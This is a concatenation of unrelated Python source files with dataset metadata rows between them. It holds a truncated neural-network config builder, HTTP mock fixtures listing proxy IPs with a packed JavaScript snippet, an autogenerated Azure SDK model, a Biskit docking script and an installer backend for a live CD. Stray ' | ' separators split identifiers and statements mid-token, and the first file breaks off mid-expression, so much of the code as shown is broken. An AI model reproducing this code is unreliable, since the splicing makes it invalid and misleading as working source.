        dict with the splice 'descriptor' string and its total 'dimension'.
    """
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    output_dim = 0
    components.append('input-node name=input dim=' + str(feat_dim))
    # this local used to be named 'list', shadowing the builtin
    descriptors = [('Offset(input, {0})'.format(n) if n != 0 else 'input') for n in splice_indexes]
    output_dim += len(splice_indexes) * feat_dim
    if ivector_dim > 0:
        components.append('input-node name=ivector dim=' + str(ivector_dim))
        descriptors.append('ReplaceIndex(ivector, t, 0)')
        output_dim += ivector_dim
    if len(descriptors) > 1:
        splice_descriptor = "Append({0})".format(", ".join(descriptors))
    else:
        splice_descriptor = descriptors[0]
    print(splice_descriptor)
    return {'descriptor': splice_descriptor,
            'dimension': output_dim}
def AddNoOpLayer(config_lines, name, input):
    """Append a NoOpComponent named {name}_noop and return its descriptor."""
    node_name = '{0}_noop'.format(name)
    dim = input['dimension']
    config_lines['components'].append(
        'component name={0}_noop type=NoOpComponent dim={1}'.format(name, dim))
    config_lines['component-nodes'].append(
        'component-node name={0}_noop component={0}_noop input={1}'.format(name, input['descriptor']))
    return {'descriptor': node_name, 'dimension': dim}
# LDA is applied as a fixed (non-trainable) affine transform read from file.
def AddLdaLayer(config_lines, name, input, lda_file):
    return AddFixedAffineLayer(config_lines, name, input, lda_file)
# Adds a FixedAffineComponent whose matrix is loaded from matrix_file.
# The returned dimension is the input dimension; presumably the matrix is
# square -- TODO confirm against the component's actual output dim.
def AddFixedAffineLayer(config_lines, name, input, matrix_file):
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    components.append('component name={0}_fixaffine type=FixedAffineComponent matrix={1}'.format(name, matrix_file))
    component_nodes.append('component-node name={0}_fixaffine component={0}_fixaffine input={1}'.format(name, input['descriptor']))
    return {'descriptor': '{0}_fixaffine'.format(name),
            'dimension': input['dimension']}
# Adds a BlockAffineComponent; both dimensions must divide evenly by
# num_blocks (enforced by the assert).
def AddBlockAffineLayer(config_lines, name, input, output_dim, num_blocks):
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    assert((input['dimension'] % num_blocks == 0) and
           (output_dim % num_blocks == 0))
    components.append('component name={0}_block_affine type=BlockAffineComponent input-dim={1} output-dim={2} num-blocks={3}'.format(name, input['dimension'], output_dim, num_blocks))
    component_nodes.append('component-node name={0}_block_affine component={0}_block_affine input={1}'.format(name, input['descriptor']))
    return {'descriptor' : '{0}_block_affine'.format(name),
            'dimension' : output_dim}
# Adds a PermuteComponent that reorders feature columns per column_map.
def AddPermuteLayer(config_lines, name, input, column_map):
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    permute_indexes = ",".join(map(lambda x: str(x), column_map))
    components.append('component name={0}_permute type=PermuteComponent column-map={1}'.format(name, permute_indexes))
    component_nodes.append('component-node name={0}_permute component={0}_permute input={1}'.format(name, input['descriptor']))
    return {'descriptor': '{0}_permute'.format(name),
            'dimension': input['dimension']}
def AddAffineLayer(config_lines, name, input, output_dim, ng_affine_options = "", max_change_per_component = 0.75):
    """Append a NaturalGradientAffineComponent named {name}_affine.

    max_change_per_component of None omits the max-change option entirely;
    otherwise it is formatted with two decimals, matching the sibling
    Add*Layer helpers.
    """
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    # Per-component max-change option
    max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
    components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options))
    component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
    return {'descriptor': '{0}_affine'.format(name),
            'dimension': output_dim}
# Affine -> ReLU -> renorm stack: the standard hidden layer used by these
# configs.  Appends three components and their nodes; returns the renorm
# node's descriptor and dimension.
def AddAffRelNormLayer(config_lines, name, input, output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0, self_repair_scale = None, max_change_per_component = 0.75):
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    # self_repair_scale is a constant scaling the self-repair vector computed in RectifiedLinearComponent
    self_repair_string = "self-repair-scale={0:.10f}".format(self_repair_scale) if self_repair_scale is not None else ''
    # Per-component max-change option
    max_change_options = "max-change={0:.2f}".format(max_change_per_component) if max_change_per_component is not None else ''
    components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3} {4}".format(name, input['dimension'], output_dim, ng_affine_options, max_change_options))
    components.append("component name={0}_relu type=RectifiedLinearComponent dim={1} {2}".format(name, output_dim, self_repair_string))
    components.append("component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, output_dim, norm_target_rms))
    component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
    component_nodes.append("component-node name={0}_relu component={0}_relu input={0}_affine".format(name))
    component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_relu".format(name))
    return {'descriptor': '{0}_renorm'.format(name),
            'dimension': output_dim}
# Affine -> p-norm -> renorm stack; the p-norm reduces pnorm_input_dim down
# to pnorm_output_dim.
def AddAffPnormLayer(config_lines, name, input, pnorm_input_dim, pnorm_output_dim, ng_affine_options = " bias-stddev=0 ", norm_target_rms = 1.0):
    components = config_lines['components']
    component_nodes = config_lines['component-nodes']
    components.append("component name={0}_affine type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, input['dimension'], pnorm_input_dim, ng_affine_options))
    components.append("component name={0}_pnorm type=PnormComponent input-dim={1} output-dim={2}".format(name, pnorm_input_dim, pnorm_output_dim))
    components.append("component name={0}_renorm type=NormalizeComponent dim={1} target-rms={2}".format(name, pnorm_output_dim, norm_target_rms))
    component_nodes.append("component-node name={0}_affine component={0}_affine input={1}".format(name, input['descriptor']))
    component_nodes.append("component-node name={0}_pnorm component={0}_pnorm input={0}_affine".format(name))
    component_nodes.append("component-node name={0}_renorm component={0}_renorm input={0}_pnorm".format(name))
    return {'descriptor': '{0}_renorm'.format(name),
            'dimension': pnorm_output_dim}
def AddConvolutionLayer(config_lines, name, input,
input_x_dim, input_y_dim, input_z_dim,
filt_x_dim, filt_y_dim,
filt_x_step, filt_y_step,
num_filters, input_vectorization,
param_stddev = None, bias_stddev = None,
filter_bias_file = None,
is_updatable = True):
assert(input['dimension'] == input_x_dim * input_y_dim * input_ |
pgaref/HTTP_Request_Randomizer | tests/mocks.py | Python | mit | 9,201 | 0.003695 | from httmock import urlmatch
free_proxy_expected = ['138.197.136.46:3128', '177.207.75.227:8080']
proxy_for_eu_expected = ['107.151.136.222:80', '37.187.253.39:8115']
rebro_weebly_expected = ['213.149.105.12:8080', '119.188.46.42:8080']
prem_expected = ['191.252.61.28:80', '167.114.203.141:8080', '152.251.141.93:8080']
sslproxy_expected = ['24.211.89.146:8080', '187.84.222.153:80', '41.193.238.249:8080']
@urlmatch(netloc=r'(.*\.)?sslproxies\.org$')
def sslproxy_mock(url, request):
return """<table class="table table-striped table-bordered" cellspacing="0" width="100%" id="proxylisttable">
<thead>
<tr>
<th>IP Address</th>
<th>Port</th>
<th>Code</th>
<th class='hm'>Country</th>
<th>Anonymity</th>
<th class='hm'>Google</th>
<th class='hx'>Https</th>
<th class='hm'>Last Checked</th>
</tr>
</thead>
<tbody>
<tr>
<td>24.211.89.146</td>
<td>8080</td>
<td>US</td>
<td class='hm'>United States</td>
<td>elite proxy</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>8 seconds ago</td>
</tr>
<tr>
<td>187.84.222.153</td>
<td>80</td>
<td>BR</td>
<td class='hm'>Brazil</td>
<td>anonymous</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>1 minute ago</td>
</tr>
<tr>
<td>41.193.238.249</td>
<td>8080</td>
<td>ZA</td>
<td class='hm'>South Africa</td>
<td>elite proxy</td>
<td class='hm'>no</td>
<td class='hx'>yes</td>
<td class='hm'>1 minute ago</td>
</tr>
</tbody>
<tfoot>
<tr>
<th class="input"><input type="text" /></th>
<th></th><th></th>
<th class='hm'></th>
<th></th>
<th class='hm'></th>
<th class='hx'></th>
<th class='hm'></th>
</tr>
</tfoot>
</table>
"""
@urlmatch(netloc=r'(.*\.)?free-proxy-list\.net$')
def free_proxy_mock(url, request):
return """<table border="0" cellpadding="0" cellspacing="0" id="proxylisttable"
id="proxylisttable">\n
<thead>\n
<tr>\n
<th>IP Address</th>
\n
<th>Port</th>
\n
<th>Code</th>
\n
<th>Country</th>
\n
<th>Anonymity</th>
\n
<th>Google</th>
\n
<th>Https</th>
\n
<th>Last Checked</th>
\n
</tr>
\n
</thead>
\n
<tbody>
<tr>
<td>138.197.136.46</td>
<td>3128</td>
<td>CA</td>
<td>Canada</td>
<td>anonymous</td>
<td>no</td>
<td>no</td>
<td>7 seconds ago</td>
</tr>
\n
<tr>
<td>177.207.75.227</td>
<td>8080</td>
<td>BR</td>
<td>Brazil</td>
<td>transparent</td>
<td>no</td>
<td>no</td>
<td>2 hours 21 minutes ago</td>
</tr>
\n
</tbody>
\n
<tfoot>\n
<tr>\n
<th class="input"><input type="text"/></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
<th></th>
\n
</tr>
\n
</tfoot>
\n
</table>"""
@urlmatch(netloc=r'(.*\.)?proxyfor\.eu')
def proxy_for_eu_mock(url, request):
return """<table class="proxy_list">
<tr>
<th>IP</th>
<th>Port</th>
<th>Country</th>
<th>Anon</th>
<th>Speed</th>
<th> Check</th>
<th>Cookie/POST</th>
</tr>
<tr>
<td>107.151.136.222</td>
<td>80</td>
<td>United States</td>
<td>HIGH</td>
<td>1.643</td>
<td>2016-04-12 17:02:43</td>
<td>Yes/Yes</td>
</tr>
<tr>
<td>37.187.253.39</td>
<td>8115</td>
<td>France</td>
<td>HIGH</td>
<td>12.779</td>
<td>2016-04-12 14:36:18</td>
| <td>Yes/Yes</td>
</tr>
</table>"""
@urlmat | ch(netloc=r'(.*\.)?rebro\.weebly\.com$')
def rebro_weebly_mock(url, request):
return """<div class="paragraph" style="text-align:left;"><strong><font color="#3ab890" size="3"><font
color="#d5d5d5">IP:Port</font></font></strong><br/><font
size="2"><strong><font color="#33a27f">213.149.105.12:8080<br/>119.188.46.42:8080</font></strong></font><br/><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font size="3"><font color="#3ab890">Country</font></font></strong></font><font size="2">
<br />Montenegro<br />China<br /></font><br /><span></span>
</div>
<div class="paragraph" style="text-align:left;"><font size="2"><strong><font color="#3ab890" size="3">Status</font></strong></font><br /><font size="2">
Elite & Anonymous<br />Elite & Anonymous<br /></font><br /><span></span>
</div>
"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com')
def prem_mock(url, request):
return """
<head>
<script src="/js/test.js"></script>
</head>
<div id="proxylist">\n
<tr class="anon">\n
<th><a href="/list/ip-address-01.htm" title="Proxy List sorted by ip address">IP address</a></th>
\n
<th><a href="/list/" title="Proxy List sorted by anonymity level">Anonymity</a></th>
\n
<th><a href="/list/time-01.htm" title="Proxy List sorted by updated time">Checked</a></th>
\n
<th><a href="/list/type-01.htm" title="Proxy list sorted by country">Country</a></th>
\n
<th><dfn title="City or State\\Region ">City</dfn></th>
\n
<th><dfn title="Internet Service Provider">ISP</dfn></th>
\n
</tr>
\n
<div id="navbar">
<ul class="pagination"><li class="active"><a href="/list/">1</a></li><li><a href="02.htm">2</a></li></ul>
</div>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="191.252.61.28|r60e6"></span>191.252.61.28:<span class="r60e6"></span></td>
<td data-label="Anonymity Type: ">high-anonymous</td>
<td data-label="Checked: ">Apr-18, 17:18</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: ">S\xe3o Jos\xe9 Dos Campos</td>
<td data-label="ISP: "><dfn title="Locaweb Servi\xe7os de Internet S/A">Locaweb
Servi\xe7o...</dfn></td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="167.114.203.141|r63c5"></span>167.114.203.141:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">transparent</td>
<td data-label="Checked: ">Apr-18, 13:22</td>
<td data-label="Country: ">Canada</td>
<td data-label="City: ">Montr\xe9al (QC)</td>
<td data-label="ISP: ">OVH Hosting</td>
</tr>
\n
<tr class="anon">
<td data-label="IP:port "><span><input type="checkbox" name="proxyIp[]" value="152.251.141.93|r63c5"></span>152.251.141.93:<span class="r63c5"></span></td>
<td data-label="Anonymity Type: ">elite </td>
<td data-label="Checked: ">Jul-16, 04:39</td>
<td data-label="Country: ">Brazil</td>
<td data-label="City: "> </td>
<td data-label="ISP: ">Vivo</td>
</tr>
\n
<tr><td colspan="6"><span><input type="checkbox" name="" value="" onclick="checkAll(this)"></span>Select All Proxies</td></tr>
</div>"""
@urlmatch(netloc=r'(.*\.)?www\.premproxy\.com', path='/js/test.js', method='get', scheme='https')
def prem_js_mock(url, request):
return b"eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};" \
b"if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};" \
b"while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('$(t).u(v(){$(\\'.s\\').0(r);" \
b"$(\\'.n\\').0(o);$(\\'.p\\').0(q);$(\\'.w\\').0(x);$(\\'.D\\').0(E);$(\\'.F\\').0(C);$(\\'.B\\').0(y);$(\\'.z\\').0(A);" \
b"$(\\'.m\\').0(i);$(\\'.7\\').0(8);$(\\'.9\\').0(6);$(\\'.4\\').0(1);$(\\'.2\\').0(5);$(\\'.3\\').0(a);$(\\'.l\\').0(b);" \
b"$(\\'.j\\').0(k);$(\\'.h\\').0(g);$(\\'.c\\').0(d);$(\\'.e\\').0(f);$( |
AutorestCI/azure-sdk-for-python | azure-mgmt-datafactory/azure/mgmt/datafactory/models/self_hosted_integration_runtime_node.py | Python | mit | 6,083 | 0.000329 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class SelfHostedIntegrationRuntimeNode(Model):
"""Properties of Self-hosted integration runtime node.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar node_name: Name of the integration runtime node.
:vartype node_name: str
:ivar machine_name: Machine name of the integration runtime node.
:vartype machine_name: str
:ivar host_service_uri: URI for the host machine of the integration
runtime.
:vartype host_service_uri: | str
:ivar status: Status of the integration runtime node. Possible values
include: 'NeedRegistration', 'Online', 'Limited', 'Offline', 'Upgrading',
'Initializing', 'InitializeFailed'
:vartype status: | str or
~azure.mgmt.datafactory.models.SelfHostedIntegrationRuntimeNodeStatus
:ivar capabilities: The integration runtime capabilities dictionary
:vartype capabilities: dict[str, str]
:ivar version_status: Status of the integration runtime node version.
:vartype version_status: str
:ivar version: Version of the integration runtime node.
:vartype version: str
:ivar register_time: The time at which the integration runtime node was
registered in ISO8601 format.
:vartype register_time: datetime
:ivar last_connect_time: The most recent time at which the integration
runtime was connected in ISO8601 format.
:vartype last_connect_time: datetime
:ivar expiry_time: The time at which the integration runtime will expire
in ISO8601 format.
:vartype expiry_time: datetime
:ivar last_start_time: The time the node last started up.
:vartype last_start_time: datetime
:ivar last_stop_time: The integration runtime node last stop time.
:vartype last_stop_time: datetime
:ivar last_update_result: The result of the last integration runtime node
update. Possible values include: 'Succeed', 'Fail'
:vartype last_update_result: str or
~azure.mgmt.datafactory.models.IntegrationRuntimeUpdateResult
:ivar last_start_update_time: The last time for the integration runtime
node update start.
:vartype last_start_update_time: datetime
:ivar last_end_update_time: The last time for the integration runtime node
update end.
:vartype last_end_update_time: datetime
:ivar is_active_dispatcher: Indicates whether this node is the active
dispatcher for integration runtime requests.
:vartype is_active_dispatcher: bool
:ivar concurrent_jobs_limit: Maximum concurrent jobs on the integration
runtime node.
:vartype concurrent_jobs_limit: int
:ivar max_concurrent_jobs: The maximum concurrent jobs in this integration
runtime.
:vartype max_concurrent_jobs: int
"""
_validation = {
'node_name': {'readonly': True},
'machine_name': {'readonly': True},
'host_service_uri': {'readonly': True},
'status': {'readonly': True},
'capabilities': {'readonly': True},
'version_status': {'readonly': True},
'version': {'readonly': True},
'register_time': {'readonly': True},
'last_connect_time': {'readonly': True},
'expiry_time': {'readonly': True},
'last_start_time': {'readonly': True},
'last_stop_time': {'readonly': True},
'last_update_result': {'readonly': True},
'last_start_update_time': {'readonly': True},
'last_end_update_time': {'readonly': True},
'is_active_dispatcher': {'readonly': True},
'concurrent_jobs_limit': {'readonly': True},
'max_concurrent_jobs': {'readonly': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
'machine_name': {'key': 'machineName', 'type': 'str'},
'host_service_uri': {'key': 'hostServiceUri', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'capabilities': {'key': 'capabilities', 'type': '{str}'},
'version_status': {'key': 'versionStatus', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'register_time': {'key': 'registerTime', 'type': 'iso-8601'},
'last_connect_time': {'key': 'lastConnectTime', 'type': 'iso-8601'},
'expiry_time': {'key': 'expiryTime', 'type': 'iso-8601'},
'last_start_time': {'key': 'lastStartTime', 'type': 'iso-8601'},
'last_stop_time': {'key': 'lastStopTime', 'type': 'iso-8601'},
'last_update_result': {'key': 'lastUpdateResult', 'type': 'str'},
'last_start_update_time': {'key': 'lastStartUpdateTime', 'type': 'iso-8601'},
'last_end_update_time': {'key': 'lastEndUpdateTime', 'type': 'iso-8601'},
'is_active_dispatcher': {'key': 'isActiveDispatcher', 'type': 'bool'},
'concurrent_jobs_limit': {'key': 'concurrentJobsLimit', 'type': 'int'},
'max_concurrent_jobs': {'key': 'maxConcurrentJobs', 'type': 'int'},
}
def __init__(self):
self.node_name = None
self.machine_name = None
self.host_service_uri = None
self.status = None
self.capabilities = None
self.version_status = None
self.version = None
self.register_time = None
self.last_connect_time = None
self.expiry_time = None
self.last_start_time = None
self.last_stop_time = None
self.last_update_result = None
self.last_start_update_time = None
self.last_end_update_time = None
self.is_active_dispatcher = None
self.concurrent_jobs_limit = None
self.max_concurrent_jobs = None
|
graik/biskit | archive_biskit2/scripts/Dock/pdb2complex.py | Python | gpl-3.0 | 2,397 | 0.0267 | #!/usr/bin/env python
##
## Biskit, a toolkit for the manipulation of macromolecular structures
## Copyright (C) 2004-2018 Raik Gruenberg & Johan Leckner
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 3 of the
## License, or any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You find a copy of the GNU General Public License in the file
## license.txt along with this program; if not, write to the Free
## Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##
##
##
import sys
import Biskit.tools as T
from Biskit import PDBModel
from Biskit.Dock import | Complex as ProteinComplex
def _use( options ):
print """
pdb2complex.py - create a reference Complex (without waters)
Syntax: pdb2complex.py -c |complex pdb|
| -r |chain index| -l |chain index|
-o |output name|
Options: -c complex pdb file or pickled PDBModel object
-r receptor chain list (e.g. 0 1 )
-l ligand ~ (e.g. 2 )
-o output file
-lo,lr ligand, receptor model output file
Default options:
"""
for key, value in options.items():
print "\t-",key, "\t",value
sys.exit(0)
### MAIN ###
############
options = T.cmdDict( {'o':'ref.complex', 'lo':'lig.model', 'ro':'rec.model' } )
if len (sys.argv) < 3:
_use( options )
## create a reference complex
print "Loading..."
ref_com = PDBModel( options['c'] )
print "Removing water..."
ref_com.remove( lambda a: a['residue_name'] in ['TIP3','HOH','WAT'] )
## extract rec and lig chains
rec_chains = T.toIntList( options['r'] )
lig_chains = T.toIntList( options['l'] )
print "Extracting rec and lig..."
ref_rec = ref_com.takeChains( rec_chains )
ref_lig = ref_com.takeChains( lig_chains )
## create Protein complex
com = ProteinComplex( ref_rec, ref_lig )
print "Saving..."
ref_lig.saveAs( T.absfile( options['lo'] ) )
ref_rec.saveAs( T.absfile( options['ro'] ) )
T.dump( com, T.absfile( options['o']) )
|
icomfort/anaconda | livecd.py | Python | gpl-2.0 | 17,872 | 0.003637 | #
# livecd.py: An anaconda backend to do an install from a live CD image
#
# The basic idea is that with a live CD, we already have an install
# and should be able to just copy those bits over to the disk. So we dd
# the image, move things to the "right" filesystem as needed, and then
# resize the rootfs to the size of its container.
#
# Copyright (C) 2007 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author(s): Jeremy Katz <katzj@redhat.com>
#
import os, sys
import stat
import shutil
import time
import subprocess
import storage
import selinux
from flags import flags
from constants import *
import gettext
_ = lambda x: gettext.ldgettext("anaconda", x)
import backend
import isys
import iutil
import packages
import logging
log = logging.getLogger("anaconda")
class Error(EnvironmentError):
pass
def copytree(src, dst, symlinks=False, preserveOwner=False,
preserveSelinux=False):
def tryChown(src, dest):
try:
os.chown(dest, os.stat(src)[stat.ST_UID], os.stat(src)[stat.ST_GID])
except OverflowError:
log.error("Could not set owner and group on file %s" % dest)
def trySetfilecon(src, dest):
try:
selinux.lsetfilecon(dest, selinux.lgetfilecon(src)[1])
except:
log.error("Could not set selinux context on file %s" % dest)
# copy of shutil.copytree which doesn't require dst to not exist
# and which also has options to preserve the owner and selinux contexts
names = os.listdir(src)
if not os.path.isdir(dst):
| os.makedirs(dst)
errors = []
for name in name | s:
srcname = os.path.join(src, name)
dstname = os.path.join(dst, name)
try:
if symlinks and os.path.islink(srcname):
linkto = os.readlink(srcname)
os.symlink(linkto, dstname)
if preserveSelinux:
trySetfilecon(srcname, dstname)
elif os.path.isdir(srcname):
copytree(srcname, dstname, symlinks, preserveOwner, preserveSelinux)
else:
shutil.copyfile(srcname, dstname)
if preserveOwner:
tryChown(srcname, dstname)
if preserveSelinux:
trySetfilecon(srcname, dstname)
shutil.copystat(srcname, dstname)
except (IOError, os.error), why:
errors.append((srcname, dstname, str(why)))
# catch the Error from the recursive copytree so that we can
# continue with other files
except Error, err:
errors.extend(err.args[0])
try:
if preserveOwner:
tryChown(src, dst)
if preserveSelinux:
trySetfilecon(src, dst)
shutil.copystat(src, dst)
except OSError as e:
errors.extend((src, dst, e.strerror))
if errors:
raise Error, errors
class LiveCDCopyBackend(backend.AnacondaBackend):
def __init__(self, anaconda):
backend.AnacondaBackend.__init__(self, anaconda)
flags.livecdInstall = True
self.supportsUpgrades = False
self.supportsPackageSelection = False
self.skipFormatRoot = True
self.osimg = anaconda.methodstr[8:]
if not stat.S_ISBLK(os.stat(self.osimg)[stat.ST_MODE]):
anaconda.intf.messageWindow(_("Unable to find image"),
_("The given location isn't a valid %s "
"live CD to use as an installation source.")
%(productName,), type = "custom",
custom_icon="error",
custom_buttons=[_("Exit installer")])
sys.exit(0)
self.rootFsType = isys.readFSType(self.osimg)
def _getLiveBlockDevice(self):
return os.path.normpath(self.osimg)
def _getLiveSize(self):
def parseField(output, field):
for line in output.split("\n"):
if line.startswith(field + ":"):
return line[len(field) + 1:].strip()
raise KeyError("Failed to find field '%s' in output" % field)
output = subprocess.Popen(['/sbin/dumpe2fs', '-h', self.osimg],
stdout=subprocess.PIPE,
stderr=open('/dev/null', 'w')
).communicate()[0]
blkcnt = int(parseField(output, "Block count"))
blksize = int(parseField(output, "Block size"))
return blkcnt * blksize
def _getLiveSizeMB(self):
return self._getLiveSize() / 1048576
def _unmountNonFstabDirs(self, anaconda):
# unmount things that aren't listed in /etc/fstab. *sigh*
dirs = []
if flags.selinux:
dirs.append("/selinux")
for dir in dirs:
try:
isys.umount("%s/%s" %(anaconda.rootPath,dir), removeDir = False)
except Exception, e:
log.error("unable to unmount %s: %s" %(dir, e))
def postAction(self, anaconda):
self._unmountNonFstabDirs(anaconda)
try:
anaconda.id.storage.umountFilesystems(swapoff = False)
os.rmdir(anaconda.rootPath)
except Exception, e:
log.error("Unable to unmount filesystems: %s" % e)
def doPreInstall(self, anaconda):
if anaconda.dir == DISPATCH_BACK:
self._unmountNonFstabDirs(anaconda)
return
anaconda.id.storage.umountFilesystems(swapoff = False)
def doInstall(self, anaconda):
log.info("Preparing to install packages")
progress = anaconda.id.instProgress
progress.set_label(_("Copying live image to hard drive."))
progress.processEvents()
osimg = self._getLiveBlockDevice() # the real image
osfd = os.open(osimg, os.O_RDONLY)
rootDevice = anaconda.id.storage.rootDevice
rootDevice.setup()
rootfd = os.open(rootDevice.path, os.O_WRONLY)
readamt = 1024 * 1024 * 8 # 8 megs at a time
size = self._getLiveSize()
copied = 0
while copied < size:
try:
buf = os.read(osfd, readamt)
written = os.write(rootfd, buf)
except:
rc = anaconda.intf.messageWindow(_("Error"),
_("There was an error installing the live image to "
"your hard drive. This could be due to bad media. "
"Please verify your installation media.\n\nIf you "
"exit, your system will be left in an inconsistent "
"state that will require reinstallation."),
type="custom", custom_icon="error",
custom_buttons=[_("_Exit installer"), _("_Retry")])
if rc == 0:
sys.exit(0)
else:
os.lseek(osfd, 0, 0)
os.lseek(rootfd, 0, 0)
copied = 0
continue
if (written < readamt) and (written < len(buf)):
raise RuntimeError, "error copying filesystem!"
copied += written
progress.set_fraction(pct = copied / float(size))
progress.processEvents()
os.close(osfd)
os.close(rootfd)
anaconda.id.instProgress = None
def _doFilesystemMangling(self, anaconda):
log.info("doing post-install fs mangling")
wait |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.